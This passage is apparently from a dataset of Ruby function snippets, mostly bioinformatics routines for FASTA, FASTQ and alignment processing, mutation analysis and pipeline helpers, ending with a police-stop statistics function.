central_chunks[i]\n file.puts second_chunks[i]\n file.puts\n i += 1\n end\n }\n\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def mutations_effect(a_anno, a_gen)\n\n if $locus[a_anno[10]] && a_anno[3].length == a_anno[4].length\n $cdna.pos = $locus[a_anno[10]]\n transcript = original()\n exon_starts = a_gen[9].split(',')\n exon_ends = a_gen[10].split(',')\n mutation_position,exon_num = position_on_transcript(a_anno[1],a_gen[3],exon_starts,exon_ends,a_gen[6],a_gen[7])\n a_anno[12] = \"exon#{exon_num}\"\n start_triplet = (mutation_position/3 * 3) - 1\n if start_triplet >= 0\n code = transcript[start_triplet..start_triplet+2]\n pos_in_triplet = mutation_position%3\n original_aa = $codes[code]\n code[pos_in_triplet] = a_anno[4]\n mutated_aa = $codes[code[0..2]]\n if original_aa != mutated_aa\n a_anno[13] = pos_in_triplet + 1\n a_anno[14] = original_aa[:name]\n a_anno[15] = mutated_aa[:name]\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"same_AA\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n else\n if $locus_non_coding[a_anno[10]]\n a_anno[13] = \"ncrna\"\n STDERR.puts a_anno.join(\"\\t\")\n else\n if (a_anno[3].length > a_anno[4].length || a_anno[3].length < a_anno[4].length)\n a_anno[13] = \"indel\"\n puts a_anno.join(\"\\t\")\n else\n a_anno[13] = \"?\"\n STDERR.puts a_anno.join(\"\\t\")\n end\n end\n end\n\nend",
"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = 
fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def merge_reads\n @reads_fpath = output_fpath(\"quanto.reads.tsv\")\n if !output_exist?(@reads_fpath)\n File.open(@reads_fpath, 'w') do |file|\n file.puts(reads_header.join(\"\\t\"))\n @objects.each do |obj|\n file.puts(open(obj[:summary_path]).read.chomp)\n end\n end\n end\n end",
"def generate_pid_fasta_file(dir=\"temp_data\")\n fasta_string=\"\"\n seq = Sequence.get(self.seq_id)\n pids = PercentIdentity.all(:seq1_id => self.seq_id, :percent_id.gte => 20, :order =>[:percent_id.desc],:unique=>true)\n fasta_string= Alignment.first(:alignment_name => self.alignment_name, :seq_id=>self.seq_id).fasta_alignment_string\n puts seq.abrev_name+\":\"+pids.count.to_s\n puts pids.map{|p| p.seq2_sequence.seq_name}.join(',')\n pids.each do |pid|\n if pid.seq2_id != seq.seq_id\n print Sequence.get(pid.seq2_id).abrev_name + \":\" + pid.percent_id.to_s + \",\"\n fasta_string = fasta_string + Alignment.first(:alignment_name=>pid.alignment_name, :seq_id=>pid.seq2_id).fasta_alignment_string(\"pid:#{pid.percent_id}\")\n end\n end\n puts \"\"\n filepath = \"#{dir}/\"+self.alignment_name+\"_\"+seq.abrev_name+\"_pid.fasta\"\n f = File.new(filepath, \"w+\")\n f.write(fasta_string)\n f.close\n filepath\n end",
"def sortmerna(input_dir, samples_h)\n\n samples, labels = [], []\n rrna_5s_a, rrna_5_8s_a, rrna_18s_a, rrna_28s_a, rrna_all = [], [], [], [], []\n\n if File.exist?(\"#{input_dir}/#{samples_h.keys[0]}_aligned.log\")\n puts \"\\t\\tRun SortMeRna Statistics...\"\n\n samples_h.each do |sample, label|\n samples.push(sample)\n labels.push(label)\n read = false\n all = 0\n File.open(\"#{input_dir}/#{sample}_aligned.log\",'r').each do |line|\n read = true if line.include?('By database:')\n if read\n if line.include?('rfam-5s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5s_a.push(value)\n all += value\n end\n if line.include?('rfam-5.8s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5_8s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-18s-id95.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_18s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-28s-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_28s_a.push(value)\n all += value\n end\n end\n end\n rrna_all.push(all.round(2))\n end\n df = Nyaplot::DataFrame.new({:sample => samples, :label => labels, :rrna_5s => rrna_5s_a, :rrna_5_8s => rrna_5_8s_a, :rrna_18s => rrna_18s_a, :rrna_28s => rrna_28s_a, :all_rrna => rrna_all })\n df = Nyaplot::DataFrame.new({:label => %w(5s 5.8s 18s 28s all), :rrna => rrna_5s_a+rrna_5_8s_a+rrna_18s_a+rrna_28s_a+rrna_all })\n\n colors = Nyaplot::Colors.qual\n frame = Nyaplot::Frame.new\n\n #[:all_rrna, :rrna_5s, :rrna_5_8s, :rrna_18s, :rrna_28s].each do |rrna|\n plot = Nyaplot::Plot.new\n plot.configure do\n x_label('rRNA type')\n y_label(\"% rRNA\")\n yrange([0,100])\n legend(true)\n end\n #bar = plot.add_with_df(df, :bar, :label, rrna) # x-> column :label, y-> column :rrna\n bar = plot.add_with_df(df, :bar, :label, :rrna)\n bar.color(colors)\n frame.add(plot)\n\n frame.export_html(\"#{$out_dir}/sortmerna.html\")\n frame_html = File.open(\"#{$out_dir}/sortmerna.html\",'a')\n frame_html << \"\\n\\n<p>\\n#{df_to_html_table(df.to_html)}\\n</p>\\n\\n\"\n frame_html.close\n end\n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def _setup_pcrs_and_seq_file_for_batch_tests\n @proj = Proj.find($proj_id) \n \n @proj.pcrs.destroy_all\n\n (0..4).each do |i|\n Pcr.create!(:fwd_primer => @primer1, :rev_primer => @primer2, :extract => @extract)\n end\n\n @proj.reload\n\n foo = File.new((File.dirname(__FILE__) + '/../fixtures/test_files/seqs.fasta'), \"w+\")\n foo.puts @proj.pcrs.collect{|p| \">seq_#{p.id}\\nACGTCGT\"}.join(\"\\n\\n\")\n foo.close\n\n @fasta_file = File.open((File.dirname(__FILE__) + '/../fixtures/test_files/seqs.fasta'), \"r\") \n end",
"def by_file(first, output)\n qseq = Bio::Ngs::Converter::Qseq.new(options.paired ? :pe : :se)\n buffers = [first] if first.kind_of? String\n buffers = first if first.kind_of? Array\n buffers.each do |file_name|\n qseq.buffer = File.open(file_name,'r') #todo: dir is not used here it could be a bug\n fastq_file = File.open(File.join(options.dir,\"#{output}.fastq\"), (options.append ? 'a' : 'w'))\n qseq.to_fastq do |fastq|\n fastq_file.puts fastq if fastq\n end\n qseq.buffer.close\n fastq_file.close \n #Write the report\n File.open(File.join(options.dir,\"#{output}.stats\"), (options.append ? 'a' : 'w')) do |file|\n file.puts ({:file_name=>file_name, :stats=>qseq.stats}.to_yaml)\n end\n end #buffers\n # puts \"Done #{file_name}\"\n end",
"def fasta2Stockholm(alignFile)\n stock = alignFile + \".stock\"\n stockf = File.new(stock, \"w\")\n stockf.printf(\"# STOCKHOLM 1.0\\n\")\n align = Hash.new\n aSize = 0\n nSize = 0\n Bio::FlatFile.new(Bio::FastaFormat, File.new(alignFile)).each do |seq|\n name = headerName(seq.definition)\n align[name] = seq.seq\n aSize = seq.seq.length\n nSize = name.size if (nSize < name.size)\n end\n 0.step(aSize, 50) do |i|\n stockf.printf(\"\\n\")\n align.keys.sort.each do |key|\n stockf.printf(\"%-#{nSize}s %s\\n\", key, align[key][i..i+49])\n end\n end\n stockf.printf(\"//\\n\")\n stockf.close\n stock\nend",
"def before_perform\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".png\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @commands = []\n @size = params['size']\n @string = params['string']\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def check_taxonomic_consistency(file, baselevelnum)\n parents = Hash.new\n levels = Hash.new\n prob = false\n short = File.new(\"short.txt\", \"w\")\n long = File.new(\"long.txt\", \"w\")\n mult = File.new(\"mult.txt\", \"w\")\n scount = 0\n lcount = 0\n mcount = 0\n File.new(file).each do |line|\n tag, taxonomy = line.chomp.split(\"\\t\")\n taxonomy = taxonomy.to_s.split(\";\")\n if tax_too_short(taxonomy, baselevelnum)\n scount += 1\n short.print line\n prob = true\n elsif tax_too_long(taxonomy, baselevelnum)\n lcount += 1\n long.print line\n prob = true\n end\n rtax = taxonomy.reverse\n 0.upto(rtax.size - 2) do |i|\n child, parent = rtax[i], rtax[i+1]\n if !parents[child]\n parents[child] = [parent]\n levels[child] = [parent]\n elsif !parents[child].include?(parent)\n parents[child].push(parent)\n end\n end\n end\n parents.keys.each do |child|\n if parents[child].size > 1\n mult << child << \" has multiple parents \" << parents[child].join(\"||\") << \"\\n\"\n mcount += 1\n prob = true\n end\n end\n if prob\n STDERR << scount << \" too short. \" << lcount << \" too long. \" << mcount << \" with multiple parents\\n\"\n else\n STDERR << \"Taxonomy looks good! Hooray!\\n\"\n end\n short.close\n long.close\n mult.close\nend",
"def parse_bam_to_intermediate_files(out_prefix)\n script=File.join(File.dirname(__FILE__),\"bam_to_insert_size_bed.awk\")\n cmd = @conf.cluster_cmd_prefix(free:1, max:12, sync:true, name:\"bed_prep_#{File.basename(@bam.path)}\") +\n %W(/bin/bash -o pipefail -o errexit -c)\n filt = \"samtools view #{@bam.path} | awk -f #{script} -vbase=#{out_prefix} -vendness=\"\n if @bam.paired?\n filt += \"pe\"\n else\n filt += \"se -vsize=#{@bam.fragment_size}\"\n end\n cmd << \"\\\"#{filt}\\\"\"\n puts cmd.join(\" \") if @conf.verbose\n unless system(*cmd)\n @errors << \"Failure prepping bedfiles for #{@bam} #{$?.exitstatus}\"\n return false\n end\n if @bam.paired?\n IO.foreach(out_prefix+FRAGMENT_SIZE_SUFFIX) do |line|\n @bam.fragment_size = line.chomp.to_i\n break\n end\n end\n IO.foreach(out_prefix+\"_num_alignments.txt\") do |line|\n @bam.num_alignments = line.chomp.to_i\n break\n end\n return true\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def run\n\t\t\t\tstart_flowcell\n\t\t\t\tdistributions = []\n\n\n\t\t\t\tunless @options[:no_distribute]\n\t\t\t\t\tdistributions = @flowcell.external_data.distributions_for @flowcell.id \n\t\t\t\tend\n\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tlogm \"running steps: #{steps.join(\", \")}\"\n\n\t\t\t\tif steps.include? \"setup\"\n\t\t\t\t\tcopy_sample_sheet\n\t\t\t\tend\n\n\t\t\t\tif steps.include? \"unaligned\"\n\t\t\t\t\t#process_unaligned_reads distributions\n\t\t\t\tend\n\n\t\t\t\tif steps.include?\n\n\n\t\t\tend\n\n\t\t\tdef logm message\n\t\t\t\tlog \"# #{message}\"\n\t\t\t\tSolexaLogger.log(@flowcell.paths.id, message) unless @options[:test]\n\t\t\tend\n\n\t\t\tdef copy_sample_sheet\n\t\t\t\tsource = File.join(@flowcell.paths.base_dir, \"SampleSheet.csv\")\n\t\t\t\tdestination = File.join(@flowcell.paths.unaligned_dir, \"SampleSheet.csv\")\n\t\t\t\tif !File.exists? source\n\t\t\t\t\tputs \"ERROR: cannot find SampleSheet at: #{source}\"\n\t\t\t\tend\n\n\t\t\t\texecute(\"cp #{source} #{destination}\")\n\t\t\tend\n\n\t\t\tdef process_unaligned_reads distributions\n\t\t\t\tstatus \"processing unaligned\"\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tfastq_groups = group_fastq_files(@flowcell.paths.unalinged_project_dir,\n\t\t\t\t\t @flowcell.paths.fastq_combine_dir)\n\t\t\t\t#unless @options[:only_distribute]\n\t\t\t\t#\tcat files fastq_groups\n\t\t\t\t#end\n\n\t\t\t\t###### LAST STOP\n\n\t\t\tend\n\n\n\t\t\t#\n # Helper method that executes a given string on the command line.\n # This should be used instead of calling system directly, as it also\n # deals with if we are in test mode or not.\n #\n def execute command\n log command\n system(command) unless @options[:test]\n end\n\n\n #\n # Gets grouping data for fastq.gz files\n #\n def group_fastq_files starting_path, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n execute \"mkdir -p #{output_path}\"\n fastq_groups = []\n \n fastq_files = Dir.glob(File.join(starting_path, fastq_search_path))\n if fastq_files.empty?\n log \"# ERROR: no fastq files found in #{starting_path}\" if fastq_files.empty?\n else\n log \"# #{fastq_files.size} fastq files found in #{starting_path}\"\n fastq_file_data = get_file_data fastq_files, \"\\.fastq\\.gz\"\n fastq_groups = group_files fastq_file_data, output_path, options\n end\n fastq_groups\n end\n\n #\n # Actually combines the related fastq files\n # using cat.\n #\n def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end\n\n\n\n #\n # Returns an array of hashes, one for each\n # new combined fastq file to be created\n # Each hash will have the name of the\n # combined fastq file and an Array of\n # paths that the group contains\n #\n def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? 
group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end\n\n\n\n\tend",
"def process_gff(gff, out)\n require 'bio/db/gff'\n\n # Read the lifted gff file into memory and parse it.\n gff3 = Bio::GFF::GFF3.new File.read(gff)\n\n # Obtain transcripts and their children. genes and other features are not\n # processed.\n transcripts = Hash.new { |h, k| h[k] = [] }\n gff3.records.each do |record|\n # GFF file includes features, comments and directives. We are only\n # interested in \"features\".\n next unless record.respond_to?(:feature_type)\n\n # If the feature is a transcript, we consider its ID attribute.\n if record.feature_type =~ /mRNA|transcript/\n transcripts[record.attributes.assoc('ID')] << record\n end\n\n # If the feature is exon or CDS, we consider its Parent attribute.\n if record.feature_type =~ /exon|CDS/\n transcripts[record.attributes.assoc('Parent')] << record\n end\n end\n\n transcripts = transcripts.map do |id, annots|\n next unless annots.map(&:seqname).uniq.length == 1 # mRNA on different scaffolds/contigs\n next unless annots.map(&:feature_type).include? 'CDS' # mRNA with no CDS\n\n # If there's a group of CDS without parent mRNA.\n if !annots.map(&:feature_type).include?('mRNA')\n mrna = [\n annots.first.seqname,\n annots.first.source,\n 'mRNA',\n annots.map(&:start).min,\n annots.map(&:end).max,\n nil,\n annots.first.strand,\n nil,\n [[\"ID\", id]]\n ]\n mrna = Bio::GFF::GFF3::Record.new(*mrna)\n annots.unshift(mrna)\n end\n\n annots\n end.flatten.compact\n\n tmp = Tempfile.open('lifted')\n tmp.write transcripts.join\n tmp.close\n sh \"gt gff3 -tidy -sort -addids -retainids #{tmp.path} > #{out}\"\nend",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n @ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def analyze_file(ind, vio, rac, sex, file, f, count, age)\n f.write(\"\\n\\n__________________________\\n#{ind == 0 ? \"San Francisco\" : ind == 1 ? \"San Diego\" : \"New Orleans\"} State Statistics\\n__________________________\\n\")\n [vio, rac, sex].each_with_index{|field, i| output(f, field, i, count)} \n get_age_stats(age, f)\n f.write(\"\\n______________\\nSubject race vs stop outcome\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"outcome\"), \" 0 \")\n f.write(\"\\n______________\\nSubject race vs subject sex\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"subject_sex\"), \" 0 \")\n f.write(\"\\n______________\\nSubject race vs subject age\\n______________\")\n sort_and_print_by_2(f, a_by_b(file, \"subject_race\", \"subject_age\"), \"age\")\nend",
